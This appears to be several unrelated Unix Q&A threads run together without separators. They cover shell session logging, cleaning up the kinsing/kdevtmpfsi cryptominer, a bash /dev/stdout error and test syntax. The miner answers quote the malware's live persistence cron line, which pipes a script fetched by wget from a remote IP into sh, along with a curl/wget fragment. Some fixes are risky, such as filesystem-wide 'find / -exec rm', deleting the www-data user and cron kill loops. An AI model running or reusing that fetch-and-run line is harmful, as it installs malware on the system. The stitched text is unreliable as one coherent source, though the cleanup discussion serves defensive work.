I'm trying to monitor command execution on a shell.
I need to separate the input command from its output, for example:
input:
ls -l /
output:
total 76
lrwxrwxrwx 1 root root 7 Aug 11 10:25 bin -> usr/bin
drwxr-xr-x 3 root root 4096 Aug 11 11:18 boot
drwxr-xr-x 17 root root 3200 Oct 11 11:10 dev
...
Also, I want to do the same if I open another shell, for example after connecting through ssh to another server.
I've been using the script command to do this and it works just fine!
It logs all command input and output even if the shell changes (through ssh, or after entering msfconsole, for example).
Nevertheless, I found two main issues:
For my project, I need to separate (using a decoder) each command from the rest; it would also be great to be able to separate command input from output, for example:
cmd1. pwd ---> /var/
cmd2. echo "hello world" ---> "hello world"
....
Sometimes the script command generates output containing garbage due to shell control characters (color escape sequences, for example), which I would like to filter out.
So I've been thinking about this, and I guess I could create a simple script that reads the file written by the "script" command and processes the data.
Nevertheless, I'm not sure what the best approach would be.
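For example, I imagine something as simple as this could strip the color escape sequences (a rough sketch, assuming GNU sed and script's default typescript output file):
sed -r 's/\x1B\[[0-9;]*[A-Za-z]//g' typescript > typescript.clean
It wouldn't catch every control character (backspaces, carriage returns), but it covers the color codes.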
I'm evaluating different solutions and I would like to know different proposals from the community.
Maybe I'm missing something and you know a better tool than the script command, or have an idea I haven't considered.
Best regards,
A useful utility for distinguishing stdout from stderr is annotate-output (install the "devscripts" package), which sends both stdout and stderr to stdout along with helpful little prefixes. For example, let's try counting characters of a file that exists, plus one that doesn't exist:
annotate-output wc -c /bin/bash /bin/nosuchshell
Output:
00:29:06 I: Started wc -c /bin/bash /bin/nosuchshell
00:29:06 E: wc: /bin/nosuchshell: No such file or directory
00:29:06 O: 1099016 /bin/bash
00:29:06 O: 1099016 total
00:29:06 I: Finished with exitcode 1
That output could be parsed separately using sed, awk, or even a tee and a few greps.
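For instance, here is a small awk sketch (assuming the O:/E: prefixes shown above; the log file names are just placeholders) that splits stdout and stderr into separate files:
annotate-output wc -c /bin/bash /bin/nosuchshell |
  awk '$2 == "O:" { print > "stdout.log" } $2 == "E:" { print > "stderr.log" }'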
We are using an Amazon EC2 (Ubuntu) instance to run Apache. Recently we noticed that there is a process using the entire CPU.
We removed it using the following procedure:
[root@hadoop002 tmp]# systemctl status 25177
● session-5772.scope - Session 5772 of user root
Loaded: loaded (/run/systemd/system/session-5772.scope; static; vendor preset: disabled)
Drop-In: /run/systemd/system/session-5772.scope.d
└─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.conf
Active: active (abandoned) since Wed 2020-01-22 16:06:01 CST; 1h 21min ago
CGroup: /user.slice/user-0.slice/session-5772.scope
├─19331 /var/tmp/kinsing
└─25177 /tmp/kdevtmpfsi
Jan 22 16:06:17 hadoop002 crontab[19353]: (root) REPLACE (root)
Jan 22 16:06:17 hadoop002 crontab[19354]: (root) LIST (root)
Jan 22 16:06:17 hadoop002 crontab[19366]: (root) LIST (root)
Jan 22 16:06:17 hadoop002 crontab[19374]: (root) REPLACE (root)
Jan 22 16:06:17 hadoop002 crontab[19375]: (root) LIST (root)
Jan 22 16:06:17 hadoop002 crontab[19383]: (root) REPLACE (root)
Jan 22 16:06:17 hadoop002 crontab[19389]: (root) REPLACE (root)
Jan 22 16:06:17 hadoop002 crontab[19390]: (root) LIST (root)
Jan 22 16:06:17 hadoop002 crontab[19392]: (root) REPLACE (root)
Jan 22 16:06:17 hadoop002 crontab[19393]: (root) LIST (root)
[root@hadoop002 tmp]# ps -ef|grep kinsing
root 19331 1 0 16:06 ? 00:00:04 /var/tmp/kinsing
root 25190 23274 0 17:27 pts/0 00:00:00 grep --color=auto kinsing
[root@hadoop002 tmp]# ps -ef|grep kdevtmpfsi
root 25177 1 99 17:27 ? 00:01:47 /tmp/kdevtmpfsi
root 25197 23274 0 17:28 pts/0 00:00:00 grep --color=auto kdevtmpfsi
[root@hadoop002 tmp]# kill -9 19331
[root@hadoop002 tmp]# kill -9 25177
[root@hadoop002 tmp]# rm -rf kdevtmpfsi
[root@hadoop002 tmp]# cd /var/tmp/
[root@hadoop002 tmp]# ll
total 16692
-rw-r--r-- 1 root root 0 Jan 13 19:45 aliyun_assist_update.lock
-rwxr-xr-x 1 root root 13176 Dec 20 02:14 for
-rwxr-xr-x 1 root root 17072128 Jan 19 17:43 kinsing
drwx------ 3 root root 4096 Jan 13 19:50 systemd-private-f3342ea6023044bda27f0261d2582ea3-chronyd.service-O7aPIg
[root@hadoop002 tmp]# rm -rf kinsing
But after a few minutes, it started again automatically. Does anyone know how to fix this?
I had the same issue with Laravel on CentOS 8. These are the steps I followed to remove the malware and patch the system.
Removing the malware from system steps:
Step 1:
Remove the malware:
Kill the two processes (kdevtmpfsi and kinsing; they may appear under the same names but with random characters appended) using htop or any other process manager.
In htop, press F3 to search for kdevtmpfsi and kinsing.
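If you prefer the command line over htop, something along these lines should work too (a sketch; -f matches the full command line, so it also catches names with random suffixes):
# pkill -9 -f kdevtmpfsi
# pkill -9 -f kinsing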
Use the following to find and delete the files:
# find / -iname kdevtmpfsi* -exec rm -fv {} \;
# find / -iname kinsing* -exec rm -fv {} \;
The output should look like:
removed '/tmp/kdevtmpfsi962782589'
removed '/tmp/kdevtmpfsi'
removed '/tmp/kinsing'
removed '/tmp/kinsing_oA1GECLm'
Step 2:
Check for a cron job:
Check whether there is a cron job that would reinitialize the malware.
I found mine in /var/spool/cron/apache (on Ubuntu: /var/spool/cron/crontabs/www-data).
It included the following:
* * * * * wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1
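To get rid of it, either edit that user's crontab and delete the line, or, if the crontab contains nothing legitimate, remove it entirely (a sketch assuming the www-data user from the Ubuntu path above; use apache on CentOS):
# crontab -u www-data -l    # inspect it first
# crontab -u www-data -r    # then remove the whole crontab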
Step 3:
Create new files and make them read-only:
# touch /tmp/kdevtmpfsi && touch /tmp/kinsing
# echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi
# echo "kinsing is fine now" > /tmp/kinsing
# chmod 0444 /tmp/kdevtmpfsi
# chmod 0444 /tmp/kinsing
Patching Laravel project:
Step 1:
Turn off APP_DEBUG:
Make sure the APP_DEBUG attribute is set to false in .env, because that's how the vulnerability gets exploited.
Step 2:
Update ignition:
Update ignition to a version higher than 2.5.1 to make sure the vulnerability is patched.
Run the following in your project folder:
$ composer update facade/ignition
The solution mentioned here worked for us. You basically create the files the miner uses, without any rights, so the miner cannot create and use them.
https://github.com/docker-library/redis/issues/217
touch /tmp/kdevtmpfsi && touch /var/tmp/kinsing
echo "everything is good here" > /tmp/kdevtmpfsi
echo "everything is good here" > /var/tmp/kinsing
touch /tmp/zzz
echo "everything is good here" > /tmp/zzz
chmod go-rwx /var/tmp
chmod 1777 /tmp
I came face to face with it after I installed and ran a Flink cluster.
It seems we were attacked by malware that tries to use our server's CPU to mine cryptocurrency.
My solution follows these steps:
First, kill the running programs:
Run htop and then press F9 to kill the processes. We have to kill both kdevtmpfsi and kinsing.
Then delete the malware files, which would otherwise be run again and use the entire CPU.
(With my centos 7)
find / -iname kdevtmpfsi -exec rm -fv {} \;
find / -iname kinsing -exec rm -fv {} \;
The result should be:
/tmp/kdevtmpfsi is removed
/var/tmp/kinsing is removed
Create files with the same names:
touch /tmp/kdevtmpfsi && touch /var/tmp/kinsing
echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi
echo "kinsing is fine now" > /var/tmp/kinsing
Now make the two files read-only (immutable) with the following commands:
chattr +i /tmp/kdevtmpfsi
chattr +i /var/tmp/kinsing
You should also reboot your server. If the problem is on a remote server that you connect to over a specific port, you can change the SSH port to increase security!
I've struggled with this miner for a few days, and in my case it was the php-fpm port 9000 being exposed.
I guess it is possible to inject some code remotely this way.
So if you use Docker with php-fpm, do NOT run your container this way:
docker run -v /www:/var/www -p 9000:9000 php:7.4
Remove the port mapping: -p 9000:9000.
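That is, run something like this instead (a sketch based on the command above; without the published port, php-fpm is only reachable from other containers on the same Docker network, not from the internet):
docker run -v /www:/var/www php:7.4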
Don't forget to re-build & restart your containers.
More details here:
https://github.com/laradock/laradock/issues/2451#issuecomment-577722571
I was also affected by this malware, and I was not using Docker or exposed to the PHPUnit vulnerability. I found this post:
https://www.ambionics.io/blog/laravel-debug-rce
which describes there was a vulnerability in facade/ignition < 2.5.2 when using Laravel in Debug mode.
Extract of Laravel .env file:
...
APP_DEBUG=true
...
After updating facade/ignition with Composer to a version > 2.5.1 and stopping the malware (steps described in the other answers), it did not come back.
Extract of Laravel composer.json file
...
"facade/ignition": "^2.5.1",
...
...then run the command:
composer update facade/ignition
The other answer here is good, and you should do everything mentioned there. But, if the thing keeps coming back, and/or you aren't actually using Docker, you probably have an unpatched RCE vulnerability in phpUnit. The details are here:
https://www.sourceclear.com/vulnerability-database/security/remote-code-execution-rce/php/sid-4487
Our situation was:
Docker is not being used at all.
We had removed all files related to the miner.
We had locked things down using the above touch and chmod commands.
The damn thing kept trying to run at seemingly random times.
After you've locked things down with the touch/chmod changes, it can't actually DO anything, but it's still annoying, and that phpUnit vulnerability is a HUGE hole that needs plugging anyway.
Hope this helps.
OK, I've been facing the same issue as a lot of you, but my process was running as the postgres user. I suspect it was because I had opened up all incoming connections.
Yeah sure, my bad.
After trying all the solutions above, none seemed to fix it permanently; it just kept spawning again with a slightly different name. No luck at all, really.
First, protect against any other connections.
First things first, restrict connections in the Postgres config file, usually found at /etc/postgresql/12/main/postgresql.conf.
Create a script to kill and remove kdevtmpfsi
Then create a new bash script in a location of your choosing:
nano kill.sh
Populate the file with the below.
#!/bin/bash
# Kill any running miner processes
kill $(pgrep kdevtmp)
kill $(pgrep kinsing)
# Remove the binaries wherever they are found
find / -iname kdevtmpfsi -exec rm -fv {} \;
find / -iname kinsing -exec rm -fv {} \;
rm /tmp/kdevtmp*
rm /tmp/kinsing*
Press Ctrl+X, then Y, then Enter to save and exit nano.
kill will kill the processes and the next four commands should delete the file(s).
We need to make the file executable with
chmod +x kill.sh
Set it to run on schedule
Now, if we set this up as a cron job to run every minute, it should help solve the issue (not an elegant solution, but it works).
sudo crontab -e
The above command opens the crontab, a place where we can define scheduled tasks to run at set intervals.
Append this to the end.
* * * * * sh {absolutepath}kill.sh > /tmp/kill.log
ie
* * * * * sh /home/user/kill.sh > /tmp/kill.log
What the crontab entry does:
* * * * * sets the schedule; this means every minute.
sh /home/user/kill.sh runs the kill script, and
> /tmp/kill.log writes any output to a file.
I know this is not a good solution. But it works.
It appears there are many attack vectors through which this malware can be loaded onto the server. In my case the malware got onto the machine through Docker:
# locate kdevtmpfsi
/var/lib/docker/overlay2/17be841bd29c[..]/diff/tmp/kdevtmpfsi
/var/lib/docker/overlay2/17be841bd29c[..]/merged/tmp/kdevtmpfsi
Docker by default exposes containers' published ports publicly, which is rather unfortunate. To fix it you will need to remove the malware and lock down Docker:
# First, stop all docker containers
$ docker stop $(docker ps -aq)
# Prune all images just for a good measure
$ docker system prune
# Kill current malware process
$ ps aux | grep kdevtmpfsi
70 21686 393 29.3 2873416 2402832 ? Ssl 22:01 19:22 /tmp/kdevtmpfsi116044092
$ kill -9 21686
# Remove any files with the name kdevtmpfsi
$ find / -iname kdevtmpfsi* -exec rm -fv {} \;
# You might need to repeat the last two commands couple times just in case
# Stop exposing docker ports with the use of IP tables
$ iptables -I DOCKER-USER -i eth0 -j DROP
$ iptables -I DOCKER-USER -m state --state RELATED,ESTABLISHED -j ACCEPT
# If no new kdevtmpfsi processes appear you should be good.
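Note that iptables rules added this way do not survive a reboot by default. One way to persist them (a sketch, assuming a Debian/Ubuntu host with the iptables-persistent package installed):
$ iptables-save > /etc/iptables/rules.v4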
The malware is adapting, and many of the solutions here no longer work. Experiment with a few approaches until you figure out what the attack vector was in your case.
I faced that issue and I solved it by running the following commands:
First, log in as root and delete the user that owns the process; in your case it is www-data:
sudo deluser --remove-home www-data
Second, kill the user's processes:
killall --user www-data
I also faced the same issue on Ubuntu 18.04.5 LTS: after deleting the malware files /tmp/kinsing and /tmp/kdevtmpfsi, they were regenerated automatically.
To fix this, I created the bash script below and set a cron job to run it.
My solution follows these steps:
First, kill the running programs:
Run htop and then press F9 to kill the processes. We have to kill both kdevtmpfsi and kinsing.
Then delete the malware files, which would otherwise be run again and use the entire CPU:
#!/bin/bash
# kinsing deleting here
PID=$(pidof kinsing)
echo "$PID"
kill -9 $PID
# /tmp/kinsing deleting here (sometimes it runs from the /tmp path)
PID=$(pidof /tmp/kinsing)
echo "$PID"
kill -9 $PID
# kdevtmpfsi deleting here
PID=$(pidof kdevtmpfsi)
echo "$PID"
kill -9 $PID
# /tmp/kdevtmpfsi deleting here (sometimes it runs from the /tmp path)
PID=$(pidof /tmp/kdevtmpfsi)
echo "$PID"
kill -9 $PID
# Delete malware files
find / -iname kdevtmpfsi -exec rm -fv {} \;
find / -iname kinsing -exec rm -fv {} \;
Save this as a file (some-script.sh) and configure a cron job for it.
Step 1: Open crontab (the cron editor) with the following command.
$ crontab -e
Step 2: If this is your first time accessing crontab, your system will likely ask you which editor you'd prefer to use. In this example, we'll go with nano (type 1 and then Enter) since it's the easiest to understand.
$ crontab -e
no crontab for linuxconfig - using an empty one
Select an editor. To change later, run 'select-editor'.
1. /bin/nano <---- easiest
2. /usr/bin/vim.basic
3. /usr/bin/vim.tiny
4. /bin/ed
Choose 1-4 [1]:
Step 3: Make a new line at the bottom of this file and insert the following code. Of course, replace our example script with the command or script you wish to execute, but keep the */5 * * * * part as that is what tells cron to execute our job every 5 minutes.
*/5 * * * * /path/to/some-script.sh
Step 4: Exit this file and save changes. To do that in nano, you'd need to press Ctrl + X, Y, and then Enter.
That's all there is to it. The cron job will now run every 5 minutes.
#!/bin/bash
kill $(pgrep kdevtmp)
kill $(pgrep kinsing)
kill $(pgrep dbused)
find / -iname kdevtmpfsi -exec rm -fv {} \;
find / -iname kinsing -exec rm -fv {} \;
find / -iname dbused -exec rm -fv {} \;
rm /tmp/kdevtmp*
rm /tmp/kinsing*
rm /tmp/dbused*
ps -ef | grep "givemexyz" | awk '{print $2}' | xargs -r kill
ps -ef | grep "dbuse" | awk '{print $2}' | xargs -r kill
rm -rf /bin/bprofr /bin/sysdr /bin/crondr /bin/initdr /usr/bin/bprofr /usr/bin/sysdr /usr/bin/crondr /usr/bin/initdr /tmp/dbused /tmp/dbusex /tmp/xms /tmp/x86_64 /tmp/i686 /tmp/go /tmp/x64b /tmp/x32b /tmp/2start.jpg
Then edit the gitlab user's crontab:
crontab -u gitlab -e
and delete the line starting with * * * * * (curl -fsSL $url/xms||wget -q -O-
I found all the above solutions helpful, but all of them seem to be temporary fixes, as we need to keep monitoring the instance and repeat the same process whenever we notice malicious activity again.
I came across this virus about a month ago and applied all the solutions above; they work fine for a limited period, after which it comes back.
I hadn't even installed Docker on the system, so an open Docker API port was not the issue.
But there is some open-source software that acts as an open gate for kinsing.
PHPMailer and Solr have remote code execution vulnerabilities that caused the whole issue.
The easy solution is to upgrade your Solr version to 8.5.1; there is also one more security setting you can apply, which in my case removed the virus permanently.
Here is the full explanation: https://github.com/amulcse/solr-kinsing-malware
In my case it ran as the www-data user. This helped:
sudo crontab -u www-data -e
remove this line(cron job):
* * * * * wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1
At the platform I worked at, we had the same problem, on an EC2 instance.
But our culprit was Redis: someone forgot to set a password the day before, and by morning our dashboard was notifying us about weird spikes in CPU usage.
If you want to verify that the malware is still running, run
ps aux | grep -v grep | grep 'kinsing\|kdevtmpfsi'
If it outputs anything it means it is executing in some form.
Our solution was:
In our Redis database we deleted a bunch of keys called "backup1", "backup2", "backup3", and "backup4".
Then we ssh to the server and used
sudo su root
ps aux | grep -v grep | grep 'kinsing\|kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %
rm -dr /tmp/kdevtmpfsi
rm -dr /var/tmp/kdevtmpfsi
We also managed to download the script that was being scheduled to execute all the time through Redis and crontab. I assume it is what reinstalled the damned malware over and over again while we tried to remove it. It's quite well made: it also kills other miners that it detects, besides trying to disable SELinux and AppArmor and some other important stuff. Really amazing work.
I've pasted it here:
https://pastebin.com/jiifURXy
In some cases this may be due to a security vulnerability found in Laravel <= v8.4.2, in the package facade/ignition (CVE-2021-3129).
Here we have an article that explains how the malware works: Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129)
This problem was resolved in version 2.5.2 of this package (facade/ignition).
If I were in your place, I would consider your instance as compromised and create a new one. In the tests I did, the malware changes places and adapts to changes made to the system in an attempt to stop it.
Maybe this would be useful for somebody.
I've found some other entries of kinsing/kdevtmpfsi:
/etc/kinsing
/usr/lib/systemd/system/bot.service
In bot.service:
ExecStart=/etc/kinsing
I've just followed the instructions from this thread, deleted both files, and rebooted the server.
Hope it helps somebody. I've spent all day trying to solve this.
I found this solution to temporarily stop the process from running (I'm not using Docker or Redis, so the hole is most likely in PHPUnit):
/bin/setfacl -m u:www-data:--- /tmp/kinsing
/bin/setfacl -m u:www-data:--- /tmp/kdevtmpfsi
It will prevent user www-data (who, in my case, was running the process) from executing the script.
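You can double-check that the ACL took effect with getfacl, for example:
getfacl /tmp/kinsing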
Also, you will most likely have a cronjob added under user www-data - remove it and run service cron restart!
Remember, that's a temporary fix/hack. You must update the vulnerable software to permanently remove this threat!
If you tried all of the methods above but the virus still shows up, maybe under a new name, you should check the server's open ports; that's how the malware got into your server.
For security, you should:
Start the firewall (see the ufw sketch below).
If you need to reach some ports on the remote server, use port forwarding instead of exposing them.
This will keep your server safe, and no more kdevtmpfsi.
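For example, on Ubuntu a common starting point looks like this (a sketch using ufw; adjust the allowed ports to whatever your server actually needs):
ufw default deny incoming
ufw allow 22/tcp
ufw allow 80/tcp
ufw allow 443/tcp
ufw enable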
For AWS users: remove the rule allowing all ports (0.0.0.0/0) outbound in the instance's security group.
I recently upgraded from CentOS 5.8 (with GNU bash 3.2.25) to CentOS 6.5 (with GNU bash 4.1.2). A command that used to work with CentOS 5.8 no longer works with CentOS 6.5. It is a silly example with an easy workaround, but I am trying to understand what is going on underneath the bash hood that is causing the different behavior. Maybe it is a new bug in bash 4.1.2 or an old bug that was fixed and the new behavior is expected?
CentOS 5.8:
(echo "hi" > /dev/stdout) > test.txt
echo $?
0
cat test.txt
hi
CentOS 6.5:
(echo "hi" > /dev/stdout) > test.txt
-bash: /dev/stdout: Not a directory
echo $?
1
Update: It doesn't look like this is a problem related to the CentOS version. I have another CentOS 6.5 machine where the command works. I have eliminated environment variables as the culprit. Any ideas?
On all the machines these commands give the same output:
ls -ld /dev/stdout
lrwxrwxrwx 1 root root 15 Apr 30 13:30 /dev/stdout -> /proc/self/fd/1
ls -lL /dev/stdout
crw--w---- 1 user1 tty 136, 0 Oct 28 23:21 /dev/stdout
Another update: It seems the subshell is inheriting the redirected stdout of the parent shell. This is not too surprising, I guess, but then why does it work on one machine and fail on the other when they are running the same bash version?
On the working machine:
((ls -la /dev/stdout; ls -la /proc/self/fd/1) >/dev/stdout) > test.txt
cat test.txt
lrwxrwxrwx 1 root root 15 Aug 13 08:14 /dev/stdout -> /proc/self/fd/1
l-wx------ 1 user1 aladdin 64 Oct 29 06:54 /proc/self/fd/1 -> /home/user1/test.txt
I think Yu Huang is right: redirecting to /tmp works on both machines. Both machines use an Isilon NAS for the /home mount, but one probably has a slightly different filesystem version or configuration that caused the error. In conclusion, redirecting to /dev/stdout should be avoided unless you know the parent process will not redirect it.
UPDATE: This problem arose after upgrade to NFS v4 from v3. After downgrading back to v3 this behavior went away.
Good morning, user1999165, :)
I suspect it's related to the underlying filesystem. On the same machine, try:
(echo "hi" > /dev/stdout) > /tmp/test.txt
/tmp/ should be a native Linux filesystem (ext3 or something similar).
On many Linux systems, /dev/stdout is an alias (a link or similar) for file descriptor 1 of the current process. Looking at it from C, the global stdout is connected to file descriptor 1.
That means echo foo > /dev/stdout is the same as echo foo 1>&1 or a redirect of a file descriptor to itself. I wouldn't expect this to work since the semantics are "close descriptor to redirect and then clone the new target". So to make it work, there must be special code which notices that the two file descriptors are actually the same and which skips the "close" step.
My guess is that on the system where it fails, BASH isn't able to figure out /dev/stdout == fd1 and actually closes it. The error message is weird, though. OTOH, I don't know any other common error which would fit better.
Note: I tried to replicate your problem on Kubuntu 14.04 with BASH 4.3.11 and here, the redirect works (i.e. I don't get an error). Maybe it's a bug in BASH 4.1 which was fixed, since.
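One way to sidestep the question entirely is to use the file-descriptor form directly, which never has to re-open /dev/stdout (a small sketch that should behave the same on both machines):
(echo "hi" >&1) > test.txt
cat test.txt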
I was seeing issues writing piped stdin input to AWS EFS (NFSv4) that paralleled this issue. (I'm using CentOS 6.8, so unfortunately I cannot upgrade bash to 4.2.)
I asked AWS support about this, here's their response --
This problem is not related to EFS itself; the problem here is with bash. This issue was fixed in bash 4.2 or later in RHEL.
To avoid this problem, please try to create a file handle before running the echo command
within a subshell; after that, the same file handle can be used as a redirect, like the example below:
exec 5> test.txt; (echo "hi" >&5); cat test.txt
hi
Is there a way to know where a command was typed? I mean, when I list the running processes, many processes show a full path name, but nothing indicates the directory from which these processes were started.
Suppose there is a Java application at /tmp/AppJava.jar. It could be executed from /home/appuser or /home/test, manually or by some script.
Is there a way to find out from which directory java -jar /tmp/AppJava.jar was executed?
Yes, you can.
You need to find the PID of the process, and then:
ls -l /proc/$PID/cwd
For example, my shell has current directory /home/igor:
$ ls -l /proc/$$/cwd
lrwxrwxrwx 1 igor igor 0 nov 11 21:49 /proc/6569/cwd -> /home/igor
You can find the PID of the process using ps:
$ ps aux | grep java.*AppJava.jar
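Putting the two together, something like this should work as a one-liner (a sketch, assuming exactly one process matches the pattern):
$ ls -l /proc/$(pgrep -f 'java -jar /tmp/AppJava.jar')/cwd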
This line is inside my /etc/rc.sysinit file on linux:
[ -r /proc/mdstat -a -r /dev/md/md-device-map ] && /sbin/mdadm -IRs
I'm not so much interested in what it actually accomplishes as opposed to how the syntax works.
It tests whether the files /proc/mdstat and /dev/md/md-device-map exist and are readable (-r), and if so executes /sbin/mdadm -IRs.
The square brackets are an alternative name for the program test (or a Bash built-in replacement thereof), which can test for lots of stuff, such as the existence of files. The -a is a logical "and".
For more details, see "CONDITIONAL EXPRESSIONS" in man bash.
The [ is actually a command name itself, that is equivalent to the test command. So, use man test to find out what -r means.
Depending on your system, you may find [ in /usr/bin:
$ ls -l /usr/bin/[
-rwxr-xr-x 1 root root 37000 Oct 5 2011 /usr/bin/[
or it could be a symlink:
$ ls -l /usr/bin/[
-rwxr-xr-x 1 root root 4 Oct 5 2011 /usr/bin/[ -> test
Some shells also have [ as a built-in command (and some even have [[ which provides additional options). As with most built-in commands though, you'll also find an implementation in the filesystem.
This means:
if /proc/mdstat is readable by you and /dev/md/md-device-map is readable by you, then run /sbin/mdadm -IRs
See help test
NOTE
[[ is a bash keyword similar to (but more powerful than) the [ command. See http://mywiki.wooledge.org/BashFAQ/031 and http://mywiki.wooledge.org/BashGuide/TestsAndConditionals
Unless you're writing for POSIX sh, we recommend [[.
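For example, the rc.sysinit line above could be written with [[ in a bash script as roughly:
[[ -r /proc/mdstat && -r /dev/md/md-device-map ]] && /sbin/mdadm -IRs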